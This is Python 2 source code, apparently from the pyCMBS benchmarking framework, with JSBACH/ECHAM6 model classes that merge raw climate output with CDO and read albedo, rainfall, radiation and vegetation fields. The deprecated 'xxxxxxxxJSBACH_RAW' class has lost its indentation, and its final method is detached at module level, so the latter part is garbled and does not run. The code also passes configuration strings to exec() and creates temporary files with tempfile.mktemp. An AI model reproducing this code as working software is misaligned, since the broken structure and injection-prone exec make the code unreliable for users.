        filename = self.data_dir + 'data/model1/' + self.experiment + '_echam6_BOT_mm_1979-2006_albedo_yseasmean.nc'
        ls_mask = get_T63_landseamask(self.shift_lon)
        albedo = Data(filename, v, read=True,
                      label='MPI-ESM albedo ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
                      shift_lon=self.shift_lon,
                      mask=ls_mask.data.data)
        return albedo
    def get_tree_fraction(self, interval='season'):
        """
        todo implement this for data from a real run !!!
        """
        if interval != 'season':
            raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
        ls_mask = get_T63_landseamask(self.shift_lon)
        # NOTE(review): hardcoded absolute path to benchmarking example data
        filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_forest_shrub.nc'
        v = 'var12'
        tree = Data(filename, v, read=True,
                    label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
                    shift_lon=self.shift_lon,
                    mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')))
        return tree
    def get_grass_fraction(self, interval='season'):
        """
        todo implement this for data from a real run !!!
        """
        if interval != 'season':
            raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
        ls_mask = get_T63_landseamask(self.shift_lon)
        # NOTE(review): hardcoded absolute path to benchmarking example data
        filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_grass_crop_pasture_2001.nc'
        v = 'var12'
        grass = Data(filename, v, read=True,
                     label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
                     #shift_lon=shift_lon,
                     mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')), squeeze=True)
        return grass
    def get_surface_shortwave_radiation_down(self, interval='season'):
        """
        get surface shortwave incoming radiation data for JSBACH
        returns Data object, or None if the raw input file is missing
        """
        if interval != 'season':
            raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
        v = 'var176'
        y1 = '1979-01-01'
        y2 = '2006-12-31'
        rawfilename = self.data_dir + 'data/model/' + self.experiment + '_echam6_BOT_mm_1979-2006_srads.nc'
        if not os.path.exists(rawfilename):
            return None
        #--- read data
        cdo = pyCDO(rawfilename, y1, y2)
        if interval == 'season':
            # seasonal means first, then multi-year seasonal climatology
            seasfile = cdo.seasmean()
            del cdo
            print 'seasfile: ', seasfile
            cdo = pyCDO(seasfile, y1, y2)
            filename = cdo.yseasmean()
        else:
            raise ValueError('Invalid interval option %s ' % interval)
        #--- read land-sea mask
        ls_mask = get_T63_landseamask(self.shift_lon)
        #--- read SIS data
        sis = Data(filename, v, read=True,
                   label='MPI-ESM SIS ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
                   #shift_lon=shift_lon,
                   mask=ls_mask.data.data)
        return sis
    def get_rainfall_data(self, interval='season'):
        """
        get rainfall data for JSBACH
        returns Data object (converted to mm/day via scale_factor=86400)
        """
        if interval == 'season':
            pass
        else:
            raise ValueError('Invalid value for interval: %s' % interval)
        #/// PREPROCESSING: seasonal means ///
        s_start_time = str(self.start_time)[0:10]
        s_stop_time = str(self.stop_time)[0:10]
        filename1 = self.data_dir + self.experiment + '_echam6_BOT_mm_1980_sel.nc'
        tmp = pyCDO(filename1, s_start_time, s_stop_time).seldate()
        tmp1 = pyCDO(tmp, s_start_time, s_stop_time).seasmean()
        filename = pyCDO(tmp1, s_start_time, s_stop_time).yseasmean()
        #/// READ DATA ///
        #1) land / sea mask
        ls_mask = get_T63_landseamask(self.shift_lon)
        #2) precipitation data
        # NOTE(review): the variable code differs between runs, hence the
        # fallback from var4 to var142 on any read failure.
        try:
            v = 'var4'
            rain = Data(filename, v, read=True, scale_factor=86400.,
                        label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
                        shift_lon=self.shift_lon,
                        mask=ls_mask.data.data)
        except:
            v = 'var142'
            rain = Data(filename, v, read=True, scale_factor=86400.,
                        label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
                        shift_lon=self.shift_lon,
                        mask=ls_mask.data.data)
        return rain
class JSBACH_RAW2(Model):
    """
    Class for RAW JSBACH model output
    works on the real raw output

    The raw (monthly mean) output streams are merged, code tables are
    applied and the results cached as netCDF files in the temporary
    directory (see _preproc_streams).
    NOTE(review): Python 2 style code (print statements) with heavy
    reliance on the external CDO binary via the cdo bindings.
    """
    #def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
    def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
        """
        The assignment of certain variables to different input streams is done in the routine
        get_jsbach_data_generic()
        Parameters
        ----------
        experiment : str
            experiment label; used to construct the input filenames
        input_format : str
            specifies file format of input data
            ['nc','grb']
        raw_outdata : str
            subdirectory (relative to data_dir) with the raw output streams
        """
        super(JSBACH_RAW2, self).__init__(filename, dic_variables, name=name, **kwargs)
        self.experiment = experiment
        self.shift_lon = shift_lon
        #self.get_data()
        self.type = 'JSBACH_RAW2'
        self.input_format = input_format
        assert self.input_format in ['nc', 'grb']
        self.raw_outdata = raw_outdata
        self._unique_name = self._get_unique_name()
        # do preprocessing of streams (only needed once!) ---
        self.files = {}
        self._preproc_streams()
        #~ self.model_dict = copy.deepcopy(model_dict)
        self.model = 'JSBACH'
    def _get_filenames_jsbach_stream(self):
        # glob pattern for the monthly mean files of the main jsbach stream
        return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_main_mm_*.' + self.input_format
    def _get_filenames_veg_stream(self):
        # glob pattern for the vegetation stream
        return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_veg_mm_*.' + self.input_format
    def _get_filenames_land_stream(self):
        # glob pattern for the land stream
        return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_land_mm_*.' + self.input_format
    def _get_filenames_surf_stream(self):
        # glob pattern for the surface stream
        return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_surf_mm_*.' + self.input_format
    def _get_filenames_albedo_VIS(self):
        # glob pattern for preprocessed visible-range albedo files
        return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_VIS_albedo.' + self.input_format
    def _get_filenames_albedo_NIR(self):
        # glob pattern for preprocessed near-infrared albedo files
        return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_NIR_albedo.' + self.input_format
    def _get_filenames_echam_BOT(self):
        # glob pattern for the ECHAM6 BOT stream (note the .sz suffix)
        return self.data_dir + self.raw_outdata + '../echam6/' + self.experiment + '_echam6_BOT_mm_*.sz'
    def _preproc_streams(self):
        """
        It is assumed that the standard JSBACH postprocessing scripts have been applied.
        Thus monthly mean data is available for each stream and code tables still need to be applied.
        This routine does the following:
        1) merge all times from individual (monthly mean) output files
        2) assign codetables to work with proper variable names
        3) aggregate data from tiles to gridbox values

        Results are cached in the temporary directory; an existing output
        file for a stream skips the (expensive) CDO processing for it.
        The produced filenames are registered in self.files.
        """
        print 'Preprocessing JSBACH raw data streams (may take a while) ...'
        cdo = Cdo()
        # jsbach stream
        print ' JSBACH stream ...'
        outfile = get_temporary_directory() + self.experiment + '_jsbach_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            codetable = self.data_dir + 'log/' + self.experiment + '_jsbach.codes'
            tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_', dir=get_temporary_directory())  # temporary file
            #~ print self.data_dir
            #~ print self.raw_outdata
            #~ print 'Files: ', self._get_filenames_jsbach_stream()
            #~ stop
            if len(glob.glob(self._get_filenames_jsbach_stream())) > 0:  # check if input files existing at all
                print 'Mering the following files:', self._get_filenames_jsbach_stream()
                cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_jsbach_stream())
                if os.path.exists(codetable):
                    cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp)  # monmean needed here, as otherwise interface does not work
                else:
                    cdo.monmean(options='-f nc', output=outfile, input=tmp)  # monmean needed here, as otherwise interface does not work
                print 'Outfile: ', outfile
                #~ os.remove(tmp)
                print 'Temporary name: ', tmp
        self.files.update({'jsbach': outfile})
        # veg stream
        print ' VEG stream ...'
        outfile = get_temporary_directory() + self.experiment + '_jsbach_veg_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_veg.codes'
            tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_veg_', dir=get_temporary_directory())  # temporary file
            if len(glob.glob(self._get_filenames_veg_stream())) > 0:  # check if input files existing at all
                cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_veg_stream())
                if os.path.exists(codetable):
                    cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp)  # monmean needed here, as otherwise interface does not work
                else:
                    cdo.monmean(options='-f nc', output=outfile, input=tmp)  # monmean needed here, as otherwise interface does not work
                os.remove(tmp)
        self.files.update({'veg': outfile})
        # land stream
        print ' LAND stream ...'
        outfile = get_temporary_directory() + self.experiment + '_jsbach_land_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_land.codes'
            tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_land_', dir=get_temporary_directory())  # temporary file
            if len(glob.glob(self._get_filenames_land_stream())) > 0:  # check if input files existing at all
                cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_land_stream())
                if os.path.exists(codetable):
                    cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp)  # monmean needed here, as otherwise interface does not work
                else:
                    cdo.monmean(options='-f nc', output=outfile, input=tmp)  # monmean needed here, as otherwise interface does not work
                os.remove(tmp)
        self.files.update({'land': outfile})
        # surf stream
        print ' SURF stream ...'
        outfile = get_temporary_directory() + self.experiment + '_jsbach_surf_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_surf.codes'
            tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_surf_', dir=get_temporary_directory())  # temporary file
            if len(glob.glob(self._get_filenames_surf_stream())) > 0:  # check if input files existing at all
                print glob.glob(self._get_filenames_surf_stream())
                cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_surf_stream())
                if os.path.exists(codetable):
                    cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp)  # monmean needed here, as otherwise interface does not work
                else:
                    cdo.monmean(options='-f nc', output=outfile, input=tmp)  # monmean needed here, as otherwise interface does not work
                os.remove(tmp)
        self.files.update({'surf': outfile})
        # ECHAM BOT stream
        print ' BOT stream ...'
        outfile = get_temporary_directory() + self.experiment + '_echam6_echam_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            codetable = self.data_dir + 'log/' + self.experiment + '_echam6_echam.codes'
            tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_echam6_echam_', dir=get_temporary_directory())  # temporary file
            if len(glob.glob(self._get_filenames_echam_BOT())) > 0:  # check if input files existing at all
                cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_echam_BOT())
                if os.path.exists(codetable):
                    cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp)  # monmean needed here, as otherwise interface does not work
                else:
                    cdo.monmean(options='-f nc', output=outfile, input=tmp)  # monmean needed here, as otherwise interface does not work
                os.remove(tmp)
        self.files.update({'echam': outfile})
        # ALBEDO file
        # albedo files as preprocessed by a script of Thomas
        print ' ALBEDO VIS stream ...'
        outfile = get_temporary_directory() + self.experiment + '_jsbach_VIS_albedo_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            if len(glob.glob(self._get_filenames_albedo_VIS())) > 0:  # check if input files existing at all
                cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_VIS())
        self.files.update({'albedo_vis': outfile})
        print ' ALBEDO NIR stream ...'
        outfile = get_temporary_directory() + self.experiment + '_jsbach_NIR_albedo_mm_full.nc'
        if os.path.exists(outfile):
            pass
        else:
            if len(glob.glob(self._get_filenames_albedo_NIR())) > 0:  # check if input files existing at all
                cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_NIR())
        self.files.update({'albedo_nir': outfile})
    def _get_unique_name(self):
        """
        get unique name from model and experiment
        @return: string with unique combination of models and experiment
        """
        return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
    def get_albedo_data(self, interval='season'):
        """
        calculate albedo as ratio of upward and downwelling fluxes
        first the monthly mean fluxes are used to calculate the albedo,
        This routine uses the definitions of the routines how to
        read upward and downward fluxes

        Returns (climatology Data, (times, fldmean, original Data)).
        """
        if self.start_time is None:
            raise ValueError('Start time needs to be specified')
        if self.stop_time is None:
            raise ValueError('Stop time needs to be specified')
        #~ tmpdict = copy.deepcopy(kwargs)
        #~ print self.dic_vars
        routine_up = self.dic_vars['surface_upward_flux']
        routine_down = self.dic_vars['sis']
        # NOTE(review): the access routine names come from the configuration
        # and are executed via exec() to bind sw_down/sw_up locally
        # (Python 2 exec-in-function semantics).
        #sw_down = self.get_surface_shortwave_radiation_down(interval=interval, **kwargs)
        cmd = 'sw_down = self.' + routine_down
        exec(cmd)
        #sw_up = self.get_surface_shortwave_radiation_up(interval=interval, **kwargs)
        cmd = 'sw_up = self.' + routine_up
        exec(cmd)
        # climatological mean
        alb = sw_up[0].div(sw_down[0])
        alb.label = self.experiment + ' albedo'
        alb.unit = '-'
        # original data
        alb_org = sw_up[1][2].div(sw_down[1][2])
        alb_org.label = self.experiment + ' albedo'
        alb_org.unit = '-'
        retval = (alb_org.time, alb_org.fldmean(), alb_org)
        return alb, retval
    def get_albedo_data_vis(self, interval='season', **kwargs):
        """
        This routine retrieves the JSBACH albedo information for VIS
        it requires a preprocessing with a script that aggregates from tile
        to box values!
        Parameters
        ----------
        interval : str
            ['season','monthly']
        """
        #~ tmpdict = copy.deepcopy(self.model_dict['albedo_vis'])
        return self.get_jsbach_data_generic(interval=interval, **kwargs)
    def get_albedo_data_nir(self, interval='season', **kwargs):
        """
        This routine retrieves the JSBACH albedo information for NIR
        it requires a preprocessing with a script that aggregates from tile
        to box values!
        Parameters
        ----------
        interval : str
            ['season','monthly']
        """
        #~ tmpdict = copy.deepcopy(self.model_dict['albedo_nir'])
        return self.get_jsbach_data_generic(interval=interval, **kwargs)
    def get_surface_shortwave_radiation_up(self, interval='season', **kwargs):
        # thin wrapper; stream/variable selection happens in the generic routine
        return self.get_jsbach_data_generic(interval=interval, **kwargs)
    def get_surface_shortwave_radiation_down(self, interval='season', **kwargs):
        # thin wrapper; stream/variable selection happens in the generic routine
        return self.get_jsbach_data_generic(interval=interval, **kwargs)
    def get_rainfall_data(self, interval='season', **kwargs):
        # thin wrapper; stream/variable selection happens in the generic routine
        return self.get_jsbach_data_generic(interval=interval, **kwargs)
    def get_temperature_2m(self, interval='season', **kwargs):
        # thin wrapper; stream/variable selection happens in the generic routine
        return self.get_jsbach_data_generic(interval=interval, **kwargs)
    def get_jsbach_data_generic(self, interval='season', **kwargs):
        """
        unique parameters are:
            filename - file basename
            variable - name of the variable as the short_name in the netcdf file
        kwargs is a dictionary with keys for each model. Then a dictionary with properties follows

        Returns (climatology Data, (times, fldmean, monthly Data)) or
        None if required input files are missing.
        """
        if not self.type in kwargs.keys():
            print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
            return None
        print self.type
        print kwargs
        locdict = kwargs[self.type]
        # read settings and details from the keyword arguments
        # no defaults; everything should be explicitely specified in either the config file or the dictionaries
        varname = locdict.pop('variable')
        units = locdict.pop('unit', 'Unit not specified')
        lat_name = locdict.pop('lat_name', 'lat')
        lon_name = locdict.pop('lon_name', 'lon')
        #model_suffix = locdict.pop('model_suffix')
        #model_prefix = locdict.pop('model_prefix')
        file_format = locdict.pop('file_format')
        scf = locdict.pop('scale_factor')
        valid_mask = locdict.pop('valid_mask')
        custom_path = locdict.pop('custom_path', None)
        thelevel = locdict.pop('level', None)
        target_grid = self._actplot_options['targetgrid']
        interpolation = self._actplot_options['interpolation']
        if self.type != 'JSBACH_RAW2':
            print self.type
            raise ValueError('Invalid data format here!')
        # define from which stream of JSBACH data needs to be taken for specific variables
        if varname in ['swdown_acc', 'swdown_reflect_acc']:
            filename1 = self.files['jsbach']
        elif varname in ['precip_acc']:
            filename1 = self.files['land']
        elif varname in ['temp2']:
            filename1 = self.files['echam']
        elif varname in ['var14']:  # albedo vis
            filename1 = self.files['albedo_vis']
        elif varname in ['var15']:  # albedo NIR
            filename1 = self.files['albedo_nir']
        else:
            print varname
            raise ValueError('Unknown variable type for JSBACH_RAW2 processing!')
        force_calc = False
        if self.start_time is None:
            raise ValueError('Start time needs to be specified')
        if self.stop_time is None:
            raise ValueError('Stop time needs to be specified')
        #/// PREPROCESSING ///
        cdo = Cdo()
        s_start_time = str(self.start_time)[0:10]
        s_stop_time = str(self.stop_time)[0:10]
        #1) select timeperiod and generate monthly mean file
        if target_grid == 't63grid':
            gridtok = 'T63'
        else:
            gridtok = 'SPECIAL_GRID'
        file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc'  # target filename
        file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
        sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
        if not os.path.exists(filename1):
            print 'WARNING: File not existing: ' + filename1
            return None
        cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
        sys.stdout.write('\n *** Reading model data... \n')
        sys.stdout.write(' Interval: ' + interval + '\n')
        #2) calculate monthly or seasonal climatology
        if interval == 'monthly':
            mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
            mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
            mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
            mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
            cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
            cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
            cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
            cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc)  # number of samples
        elif interval == 'season':
            mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
            mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
            mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
            mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
            cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
            cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
            cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
            cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc)  # number of samples
        else:
            raise ValueError('Unknown temporal interval. Can not perform preprocessing! ')
        if not os.path.exists(mdata_clim_file):
            return None
        #3) read data
        if interval == 'monthly':
            thetime_cylce = 12
        elif interval == 'season':
            thetime_cylce = 4
        else:
            print interval
            raise ValueError('Unsupported interval!')
        mdata = Data(mdata_clim_file, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
        mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
        mdata.std = mdata_std.data.copy()
        del mdata_std
        mdata_N = Data(mdata_N_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
        mdata.n = mdata_N.data.copy()
        del mdata_N
        # ensure that climatology always starts with January, therefore set date and then sort
        mdata.adjust_time(year=1700, day=15)  # set arbitrary time for climatology
        mdata.timsort()
        #4) read monthly data
        mdata_all = Data(file_monthly, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
        mdata_all.adjust_time(day=15)
        if target_grid == 't63grid':
            mdata._apply_mask(get_T63_landseamask(False, area=valid_mask))
            mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask))
        else:
            tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid)
            mdata._apply_mask(tmpmsk)
            mdata_all._apply_mask(tmpmsk)
            del tmpmsk
        mdata_mean = mdata_all.fldmean()
        # return data as a tuple list
        retval = (mdata_all.time, mdata_mean, mdata_all)
        del mdata_all
        return mdata, retval
class JSBACH_SPECIAL(JSBACH_RAW2):
    """
    special class for more flexible reading of JSBACH input data
    it allows to specify the input format and the directory of the input data
    in case that you use a different setup, it is probably easiest to
    just copy this class and make the required adaptations.
    """
    def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='nc', raw_outdata='', **kwargs):
        # NOTE(review): ``model_dict`` is forwarded as a keyword argument,
        # but JSBACH_RAW2.__init__ has no such parameter any more; it is
        # swallowed by its **kwargs and passed on towards Model -- confirm
        # this is intended.
        super(JSBACH_SPECIAL, self).__init__(filename, dic_variables, experiment, name=name, shift_lon=shift_lon, model_dict=model_dict, input_format=input_format, raw_outdata=raw_outdata, **kwargs)
class xxxxxxxxJSBACH_RAW(Model):
"""
Class for RAW JSBACH model output
works on manually preprocessed already concatenated data
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, intervals='monthly', **kwargs):
super(JSBACH_RAW, self).__init__(filename, dic_variables, name=name, intervals=intervals, **kwargs)
print('WARNING: This model class should be depreciated as it contained a lot of hardcoded dependencies and is only intermediate')
#TODO: depreciate this class
stop
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_RAW'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_temperature_2m(self, interval='monthly', **kwargs):
"""
get surface temperature (2m) from JSBACH model results
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'temp2'
rawfile = self.data_dir + self.experiment + '_echam6_echam_' + variable + '_ALL.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
def get_albedo_data(self, interval='monthly', **kwargs):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
"""
# read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon) # TODO make this more flexible
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
Fd = self.get_surface_shortwave_radiation_down(**kwargs)
Fu = self.get_surface_shortwave_radiation_up(**kwargs)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
if Fu_i is None:
return None
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
if Fd_i is None:
return None
lab = Fu_i.label
# albedo for chosen interval as caluclated as ratio of means of fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
Fu_i._apply_mask(ls_mask.data)
#albedo for monthly data (needed for global mean plots )
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
#-----------------------------------------------------------------------
def _do_preprocessing(self, rawfile, varname, s_start_time, s_stop_time, interval='monthly', force_calc=False, valid_mask='global', target_grid='t63grid'):
"""
perform preprocessing
* selection of variable
* temporal subsetting
"""
cdo = Cdo()
if not os.path.exists(rawfile):
print('File not existing! %s ' % rawfile)
return None, None
# calculate monthly means
file_monthly = get_temporary_directory() + os.sep + os.path.basename(rawfile[:-3]) + '_' + varname + '_' + s_start_time + '_' + s_stop_time + '_mm.nc'
if (force_calc) or (not os.path.exists(file_monthly)):
cdo.monmean(options='-f nc', output=file_monthly, input='-seldate,' + s_start_time + ',' + s_stop_time + ' ' + '-selvar,' + varname + ' ' + rawfile, force=force_calc)
else:
pass
if not os.path.exists(file_monthly):
raise ValueError('Monthly preprocessing did not work! %s ' % file_monthly)
# calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
# read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.name, shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.name + ' std', unit='-', shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.name + ' std', shift_lon=False, lat_name='lat', lon_name='lon')
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.name, shift_lon=False, time_cycle=12, lat_name='lat', lon_name='lon')
mdata_all.adjust_time(day=15)
#mask_antarctica masks everything below 60 degree S.
#here we only mask Antarctica, if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
    """
    get surface shortwave incoming radiation data for JSBACH

    Parameters
    ----------
    interval : str
        specifies the aggregation interval. Possible options: ['season','monthly']
    """
    settings = kwargs[self.type]
    # Fixed analysis period (TODO, as upstream: move this to the JSON
    # dictionary or some parameter file).
    start_date = '1980-01-01'
    stop_date = '2010-12-31'
    raw_file = '%s%s_jsbach_%s_%s.nc' % (self.data_dir, self.experiment,
                                         start_date[:4], stop_date[:4])
    return self._do_preprocessing(raw_file, 'swdown_acc', start_date,
                                  stop_date, interval=interval,
                                  valid_mask=settings['valid_mask'])
#-----------------------------------------------------------------------
